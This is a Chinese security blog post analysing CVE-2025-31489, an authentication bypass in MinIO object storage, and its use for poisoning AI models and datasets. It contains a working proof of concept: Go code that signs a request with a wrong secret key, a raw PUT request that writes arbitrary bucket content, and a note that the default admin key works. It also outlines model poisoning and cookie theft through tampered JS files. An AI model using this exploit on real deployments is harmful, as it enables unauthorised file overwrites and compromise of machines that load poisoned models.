云对象存储桶验证漏洞?模型和数据被投毒、机器沦陷?- AI & 云安全

于 2025-04-22 15:30:39 发布
阅读量997 收藏 30
点赞数 8
文章标签: 网络安全 信息安全 漏洞挖掘 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83799022/article/details/147423084
版权

一、前言

随着云计算的兴起,私有云也逐渐成为企业数字化转型的重要选择之一。然而,无论是公有云还是私有云,在建设过程中都曾爆出过许多安全漏洞。今天,我们就来聊一聊最近爆出的私有云的对象存储系统的漏洞(可以导致任意覆盖写桶里面的文件)以及这个漏洞场景挖掘以及影响。

 

二、什么是MinIO

MinIO 是在 GNU Affero 通用公共许可证 v3.0 下发布的高性能对象存储。它与 Amazon S3 云存储服务的 API 兼容。使用 MinIO 为机器学习、分析和应用程序数据工作负载构建高性能基础设施。

三、漏洞危害

3.1、投毒大模型-机器沦陷/训练出错

在AI日常开发训练场景中使用MinIO进行存储,利用此漏洞我们可以进行投毒大模型,通过覆盖大模型文件,可导致加载模型的机器中毒或者进行商业破坏训练结果。

大模型供应链安全(包含投毒的细节):

加载数据集或模型可能就中毒!大模型供应链安全:加载数据集或模型可能就中毒!大模型供应链安全

投毒导致的危害:

“字节跳动发生大模型训练被实习生投毒事件。据悉,该事件发生在字节跳动商业化团队,因实习生对团队资源分配不满,利用HF(huggingface)的漏洞,通过共享模型注入破坏代码,导致团队模型训练成果受损。”

下面是测试代码,模拟利用漏洞覆盖模型,对大模型文件投毒。

模拟业务下载存储桶的里面模型进行加载模型,自动执行了w命令(可执行其他命令),这里w命令是模拟的后门。

3.2、投毒数据集-沦陷机器/修改模型回答

在AI日常开发训练场景中使用MinIO进行存储,利用此漏洞可以将大模型学习的数据集进行污染,大模型训练的机器加载数据集的时候,同样会被投入后门,造成机器沦陷。(流程跟上面是一样的)

3.3、危害用户数据的完整性

上面两个例子中演示的是在大模型训练使用的时候可以导致机器被沦陷,当然也可以去更改js文件窃取cookie、更改其他配置或者数据,可能造成更严重的后果。

云对象存储的完整性收到破坏,业务将毁于一旦。

四、漏洞分析

漏洞公告(CVE-2025-31489):

1、make sure to validate signature unsigned trailer stream: https://github.com/minio/minio/pull/21103

2、https://github.com/golang/vulndb/issues/3594

3、https://github.com/minio/minio/commit/8c70975283f9f4ce80f331a25c7475a36279e519

MinIO在 PUT实现Trailer中,允许任何未经过校验acces-key上传对象(该acces-key对存储桶具有 “WRITE” 权限),acces-key 是一个公共信息,如预签名url中会暴露出来,并且经过与星光大佬的探讨中,并且不用access-key,进一步减少利用条件。

先决条件:

1、需要知道桶的地址(一般业务会提供桶给客户使用,可以获取地址)

2、知道具有该桶写入权限的access-key(实际上这个条件可以几乎忽略,详情在文章后面)

漏洞危害:

可以对桶里面的文件进行写入(并且可以覆盖)

4.1、环境搭建

可以通过如下命令行进行搭建

docker run --name minio -p 9000:9000 -p 9001:9001 -e "MINIO_ROOT_USER=minioadmin" -e "MINIO_ROOT_PASSWORD=minioadmin" minio/minio:RELEASE.2025-02-03T21-03-04Z minio server /home/shared --console-address ":9001" --address ":9000"

2.2、疑似sink点

通过github的commit以及后续的debug,疑似sink在这里(通过newUnsignedV4ChunkedReader函数绕过权限校验写文件),minio在这里增加了鉴权校验。

那如何分析整个数据链路呢?

2.3、入口以及路由分析

minio使用的是golang自带的库,"net/http",通过HandlerFunc注册了一个put /xxx的方法即可,没有太复杂的路由,比较简单,很快就能找到对应的路由(如何构造http请求进入到这个函数中)

// PutObject
router.Methods(http.MethodPut).Path("/{object:.+}").
    HandlerFunc(s3APIMiddleware(api.PutObjectHandler, traceHdrsS3HFlag))

2.4、数据流分析

来到PutObjectHandler函数中,这里观察到进入sink点需要解决两个问题:需要绕过isPutActionAllowed函数校验、以及满足rAuthType参数。

2.4.1、解决rAuthType的校验

rAuthType是通过getRequestAuthType函数获取到的

一直跟到isRequestUnsignedTrailerV4函数中,发现满足两个条件即可。

1、满足header头X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER

2、满足header头Content-Encoding: aws-chunked

header可以随意控制,这个校验很容易过掉。

GET /test/lufeisec.txt HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: lufeisec
X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER
Content-Encoding: aws-chunked

2.4.2、解决isPutActionAllowed 校验

第二个校验是isPutActionAllowed函数校验

// Check if put is allowed
if s3Err = isPutActionAllowed(ctx, rAuthType, bucket, object, r, policy.PutObjectAction); s3Err != ErrNone {
    writeErrorResponse(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)
    return
}

获取到ak以及ak的owner

判断密钥是否对桶有写入权限

如检测是否为onwer、服务账号、临时账号是否有权限等等

我们需要试验一下,使用ak进行进行签名(使用错误密钥),是否可以写桶

2.5、达到sink点

2.5.1、如何伪造签名签名?

在minio测试案例中有对原生http请求签名的函数,我们直接使用它的签名函数即可

我们需要完成下面步骤:

1、我们新建一个test桶的bucket

2、新建一个对bucket有权限的AK(不需要密钥)

3、即可完成对mino的桶进行写入

func errSign() {
    // HTTP request to create the bucket.
    endPoint := "http://127.0.0.1:9000"
    accessKey := "xiL0MShPspD3axSWx8ES"
    secretKey := "SKxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    bucketName := "test"
    req, err := http.NewRequest(http.MethodPut, getPutObjectURL(endPoint, bucketName, "2.txt"), nil)
    req.Header.Set("X-Amz-Content-Sha256", "STREAMING-UNSIGNED-PAYLOAD-TRAILER")
    req.Header.Set("Content-Encoding", "aws-chunked")
    err = signRequestV4(req, accessKey, secretKey)
    if err != nil {
       fmt.Println(err)
    }


    fmt.Println(req.URL)
    // execute the request.
    proxyURL, err := url.Parse("http://127.0.0.1:4321")
    if err != nil {
       fmt.Println("Invalid proxy URL:", err)
       return
    }
    customTransport := &http.Transport{
       Proxy: http.ProxyURL(proxyURL),
    }
    s := &http.Client{
       Transport: customTransport,
    }
    // execute the request.
    response, err := s.Do(req)
    byts, err := io.ReadAll(req.Body)
    fmt.Println(response.Status, byts, err)
    if err != nil {
       fmt.Println(err)
    }
}

2.5.2、如何上传东西呢?

commit中也有给出案例

我们可以直接构造http请求包

PUT /test/lufei_sec.txt HTTP/1.1
Host: 127.0.0.1:9000
Authorization: AWS4-HMAC-SHA256 Credential=xiL0MShPspD3axSWx8ES/20250415//s3/aws4_request, SignedHeaders=content-encoding;host;x-amz-content-sha256;x-amz-date, Signature=0b23e0428191d0d321106cef9f343d8f8018a8260e01323af364c2e6267aee28
Content-Encoding: aws-chunked
X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER
X-Amz-Date: 20250415T060543Z
Accept-Encoding: gzip, deflate, br
X-Amz-Trailer: x-amz-checksum-crc32
Connection: close


8
foobar!


0
x-amz-checksum-crc32:rK0DXg==

2.6、调用链

cmd.newUnsignedV4ChunkedReader (streaming-v4-unsigned.go:33) github.com/minio/minio/cmd
cmd.objectAPIHandlers.PutObjectHandler (object-handlers.go:1853) github.com/minio/minio/cmd
<autogenerated>:2
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.httpTrace.func1 (http-tracer.go:190) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
gzhttp.NewWrapper.func1.1 (compress.go:519) github.com/klauspost/compress/gzhttp
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.maxClients.func1 (handler-api.go:352) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.collectAPIStats.func1 (handler-utils.go:338) github.com/minio/minio/cmd
cmd.s3APIMiddleware.func1 (api-router.go:246) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setBucketForwardingMiddleware.func1 (generic-handlers.go:488) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setUploadForwardingMiddleware.func1 (generic-handlers.go:601) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setRequestValidityMiddleware.func1 (generic-handlers.go:471) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setRequestLimitMiddleware.func1 (generic-handlers.go:137) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setCrossDomainPolicyMiddleware.func1 (crossdomain-xml-handler.go:46) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setBrowserRedirectMiddleware.func1 (generic-handlers.go:167) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setAuthMiddleware.func1 (auth-handler.go:661) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.httpTracerMiddleware.func1 (http-tracer.go:89) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.addCustomHeadersMiddleware.func1 (generic-handlers.go:566) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
mux.(*Router).ServeHTTP (mux.go:228) github.com/minio/mux
cors.(*Cors).Handler.func1 (cors.go:289) github.com/rs/cors
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
cmd.setCriticalErrorHandler.func1 (generic-handlers.go:590) github.com/minio/minio/cmd
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
http.(*Server).Init.func1 (server.go:118) github.com/minio/minio/internal/http
http.HandlerFunc.ServeHTTP (server.go:2220) net/http
http.serverHandler.ServeHTTP (server.go:3210) net/http
http.(*conn).serve (server.go:2092) net/http
http.(*Server).Serve.gowrap3 (server.go:3360) net/http
runtime.goexit (asm_arm64.s:1223) runtime
 - Async Stack Trace
http.(*Server).Serve (server.go:3360) net/http

五、构造PoC的问题

4.1、解决获取ak的先决条件

我们再回到globalIAMSys.IsAllowed函数,看是否可以绕过?

cred, owner, s3Err = getReqAccessKeyV4(r, region, serviceS3)

checkKeyValid,判断当前的密钥是否为globalActiveCred,而globalActiveCred就是我们初始化的minio的账号。

我们不再需要一个ak,而是需要一个管理员的账号即可,默认是minioadmin。

注:对象存储的对象预签名的时候也会泄漏AK出来

4.2、自定义内容修改

如何修改我们自定义的想上传的内容呢? 这里主要涉及到两块:长度检测和签名校验。

长度的问题,一开始以为是len函数计算即可,后面经过翻查到下面源码,发现是使用16进制。

cmd/streaming-v4-unsigned.go:127
switch {
case b >= '0' && b <= '9':
    size = size<<4 | int(b-'0')
case b >= 'a' && b <= 'f':
    size = size<<4 | int(b-('a'-10))
case b >= 'A' && b <= 'F':
    size = size<<4 | int(b-('A'-10))
default:
    if cr.debug {
       fmt.Printf("err size: %v\n", string(b))
    }
    cr.err = errMalformedEncoding
    return n, cr.err
}

校验是使用CRC32对内容进行计算,获取到bytes结果后,再进行base64编码。

五、总结

文章深入分析了云对象存储 MinIO任意写桶的漏洞(CVE-2025-31489)以及填了编写PoC的坑,并且挖掘云与AI结合场景的风险场景(可导致AI业务影响)。

安全BP并非只有直接拿机器权限,而是贴合业务,理解业务,才能保护好业务。

多个SRC挖掘大佬都在使用的 OSS存储遍历漏洞检测工具,附下载链接
TG_punkll的博客
09-10 1949
多个SRC挖掘大佬都在使用的 OSS存储遍历漏洞检测工具,附下载链接
【有啥问啥】大模型应用中常听说的投毒实验是什么?
Chauvin的博客
07-29 2379
数据投毒(Data Poisoning)模型中毒(Model Poisoning)后门攻击(Backdoor Attacks)大模型投毒实验是一个严重的安全问题,需要在数据收集、模型训练、验证部署的各个环节采取有效的防范措施。通过数据审查、模型验证安全审计用户反馈等手段,可以有效降低投毒攻击的风险,确保大模型安全可靠性。在人工智能技术不断发展的今天,模型安全性问题将越来越受到关注,只有通过不断提升安全防护措施,才能应对日益复杂的安全威胁。
OSS存储漏洞总结
RMC131的博客
07-07 7317
OSS,对象存储服务,对象存储可以简单理解为用来存储图片、音频、视频等非结构化数据数据池。相对于主机服务器,具有读写速度快,利于分享的特点。OSS工作原理: 数据以对象(Object)的形式存储在OSS的存储空间(Bucket )中。如果要使用OSS存储数据,您需要先创建Bucket,并指定Bucket的地域、访问权限、存储类型等属性。创建Bucket后,您可以将数据以Object的形式上传到Bucket,并指定Object的文件名(Key)作为其唯一标识。
紧急更新!MinIO发布RELEASE.2025-04-03T14-56-28Z版本,修复高危漏洞CVE-2025-31489,用户需立即升级!
福大大架构师每日一题
04-05 574
MinIO作为流行的云原生对象存储解决方案,其安全性至关重要。本次RELEASE.2025-04-03T14-56-28Z版本的发布,再次体现了MinIO团队对安全问题的快速响应能力。的问题,可能导致未授权上传风险,所有MinIO用户需。,向已有写入权限的存储上传任意对象。,确保数据存储环境的安全稳定!近日,MinIO团队发布了。以避免潜在的安全威胁。,攻击者可能利用此漏洞。版本,这是一个重要的。
云对象存储漏洞模型数据投毒机器沦陷- AI & 云安全
最新发布
lufeirider的博客
04-20 1061
今天,我们就来聊一聊最近爆出的私有云的对象存储系统的漏洞(可以导致任意覆盖写里面的文件)以及这个漏洞场景挖掘以及影响。
云安全-OSS存储漏洞总结
lza20001103的博客
02-25 1268
云安全-OSS存储漏洞总结
S3存储配置错误致成千上万印度板球球员个人信息泄露
weixin_33796205的博客
05-17 178
在本月早些时候,Kromtech安全中心的研究人员再次发现了两个因配置错误而在线暴露的Amazon S3存储。从数据的内容来看,它们似乎归属于印度板球管理委员会(Board of Control for Cricket in India,BCCI)。 BCCI是印度板球国家管理机构。研究人员表示,这两个暴露的S3存储包含有大量的敏感数据,涉及从2015年至今向BCCI提交赛季参赛申请的约1.5...
Oracle Database Server &#39;TNS Listener&#39;远程数据投毒漏洞CVE-2012-1675)的完美解决方法
09-10
主要介绍了Oracle Database Server &#39;TNS Listener&#39;远程数据投毒漏洞CVE-2012-1675的完美解决方法的相关资料,本文介绍的非常详细,具有参考借鉴价值,需要的朋友可以参考下
Oracle Database Server &#39;TNS Listener&#39;远程数据投毒漏洞CVE-2012-1675)的解决文档
05-25
安全厂家给出的解决办法: 链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this ...
网络安全领域】中国安全模型行业概览:AI重构网络安全与攻防博弈-提升防护力与应对多重挑战了中国安全
04-16
然而,大模型技术也面临数据投毒、隐私泄露等挑战,需要全面加强安全防护监管。中国在全球算力领域领先,AI算力支出居首,为安全模型的发展奠定了基础,但仍需依赖高质量数据以确保模型精度与国际竞争力。大模型...
阿里云OSS存储Bucket 劫持漏洞
技术超强的网络安全平台
05-23 677
找目标实战 fofa指纹提供两个精准检索:body="NoSuchBucket" &amp;amp;&amp;amp; body="BucketName" &amp;amp;&amp;amp; body="aliyuncs.com"粗略检索:body="NoSuchBucket" &amp;amp;&amp;amp; body="BucketName" 劫持利用环节 随机挑选 访问xxx.com提示 NoSuchBucket + BucketaName,这里就能想到了 阿里云 的bucket劫持漏洞
认识漏洞-云主机秘钥泄露、OSS存储漏洞
Boom!脑洞大爆炸的博客
12-17 499
认识漏洞-云主机秘钥泄露、OSS存储漏洞
OSS存储密钥泄露【案例】
M1n9K1n9的博客
07-12 1593
同样的,在前几天的攻防演练中的经历,本文我们将为OSS存储单独做文章。
#渗透测试#漏洞挖掘#红蓝攻防#SRC漏洞挖掘#云安全#之OSS存储攻击
soc的博客
12-26 1206
对象存储OSS(Object Storage Service)是一种基于对象模型的存储服务,它将数据以对象的形式存储,每个对象由元数据数据唯一标识符组成,旨在为用户提供高可靠性、高可用性、高扩展性的海量数据存储解决方案。OSS(Object Storage Service,对象存储服务)是一种海量、安全、低成本、高可靠的云存储服务。OSS存储(Bucket)是OSS中的基本容器单元,用于存储对象(Object)。每个对象都是存储中的一个条目,包含数据、键(Key)数据(Metadata)。
阿里云OSS对象存储Bucket 劫持漏洞复现
weixin_52501704的博客
09-06 2998
阿里云OSS对象存储Bucket 劫持漏洞复现
云安全之OSS对象存储漏洞
未完成的歌~的博客
03-24 1262
对象存储服务(Object Storage Service,OSS) 是一种面向非结构化数据的云存储服务,适用于海量数据的存储管理。与传统的文件存储(如NAS)块存储(如硬盘)不同,对象存储以“对象”为基本单元,通过唯一的标识符(如URL或Key)来访问数据,适合存储图片、视频、日志、备份等任意类型文件。对象存储中可以有多个(Bucket),然后把对象(Object)放在里,对象又包含了三个部分:Key、Data Metadata。下面通过阿里云、华为云、腾讯云三个厂商总结一下常见的漏洞
MinIO集群模式信息泄露漏洞CVE-2023-28432)
2201_75756681的博客
12-27 3475
MinIO是一个用的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值